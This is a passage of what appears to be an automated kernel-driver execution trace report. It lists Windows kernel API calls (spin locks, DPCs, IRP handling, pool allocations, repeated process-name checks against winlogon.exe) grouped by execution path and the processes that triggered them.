| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
Execution Path #195 (length: 64, count: 1, processes: 1 incomplete)
»
| Information | Value |
|---|---|
| Sequence Length | 64 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a78773c, SpinLock_unk_out = 0xffffe0003a78773c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a78773c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a78773c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a78773c, SpinLock_unk_out = 0xffffe0003a78773c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a78773c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a78773c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b1fe4, SpinLock_unk_out = 0xffffe0003a7b1fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b1fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b1fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b1fe4, SpinLock_unk_out = 0xffffe0003a7b1fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b1fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b1fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b1fe4, SpinLock_unk_out = 0xffffe0003a7b1fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b1fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b1fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b1fe4, SpinLock_unk_out = 0xffffe0003a7b1fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b1fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b1fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b1fe4, SpinLock_unk_out = 0xffffe0003a7b1fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b1fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b1fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd00029b18eb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c8359e0, Irp_unk_out = 0xffffe0003c8359e0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd00029b18e20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c8359e0, Irp_unk_out = 0xffffe0003c8359e0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77c464, SpinLock_unk_out = 0xffffe0003a77c464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77c464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77c464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x2 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x20e8, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a77f000 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a77f0e4, Length = 0x2000, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9d74c0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, MemoryDescriptorList_unk_out = 0xffffe0003b9d74c0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77e1bc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
Kernel Graph 29
Code Block #37 (EP #87)
»
| Information | Value |
|---|---|
| Trigger | IopfCompleteRequest+0x213 |
| Start Address | 0xfffff800fc2c6430 |
Execution Path #87 (length: 1, count: 4, processes: 2)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 3 |
| Process 24 (csrss.exe, PID: 456) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeSetEvent | Event_unk = 0xffffd000292aa350, Increment_unk = 0x0, Wait = 0, Event_unk_out = 0xffffd000292aa350, ret_val_out = 0 |
Kernel Graph 30
Code Block #38 (EP #93, #103)
»
| Information | Value |
|---|---|
| Trigger | IopfCompleteRequest+0x213 |
| Start Address | 0xfffff800fc2c5f40 |
Execution Path #93 (length: 13, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 13 |
Processes
»
| Process | Count |
|---|---|
| Process 24 (csrss.exe, PID: 456) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7881bc, SpinLock_unk_out = 0xffffe0003a7881bc, ret_val_unk_out = 0x2 |
| IoFreeMdl | Mdl_unk = 0xffffe000487ed580 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77e010, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x3f, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a7b6490 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7881bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7881bc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoFreeIrp | Irp_unk = 0xffffe0003c839cf0 |
Execution Path #103 (length: 12, count: 10, processes: 4)
»
| Information | Value |
|---|---|
| Sequence Length | 12 |
Processes
»
| Process | Count |
|---|---|
| Process 24 (csrss.exe, PID: 456) | 1 |
| Process 2 (System, PID: 4) | 7 |
| Process 30 (explorer.exe, PID: 1184) | 1 |
| Process 21 (smss.exe, PID: 300) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7881bc, SpinLock_unk_out = 0xffffe0003a7881bc, ret_val_unk_out = 0x2 |
| IoFreeMdl | Mdl_unk = 0xffffe000487ed580 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763750, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7881bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7881bc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoFreeIrp | Irp_unk = 0xffffe0003c841cf0 |
Kernel Graph 31
Code Block #39 (EP #94, #96, #104, #107, #136)
»
| Information | Value |
|---|---|
| Trigger | KiExecuteAllDpcs+0x26c |
| Start Address | 0xfffff800fc2c46a0 |
Execution Path #94 (length: 6, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 6 |
Processes
»
| Process | Count |
|---|---|
| Process 24 (csrss.exe, PID: 456) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x3f, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a779840 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
Execution Path #96 (length: 9, count: 50, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 9 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 50 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
Execution Path #104 (length: 5, count: 10, processes: 4)
»
| Information | Value |
|---|---|
| Sequence Length | 5 |
Processes
»
| Process | Count |
|---|---|
| Process 24 (csrss.exe, PID: 456) | 1 |
| Process 2 (System, PID: 4) | 7 |
| Process 30 (explorer.exe, PID: 1184) | 1 |
| Process 21 (smss.exe, PID: 300) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
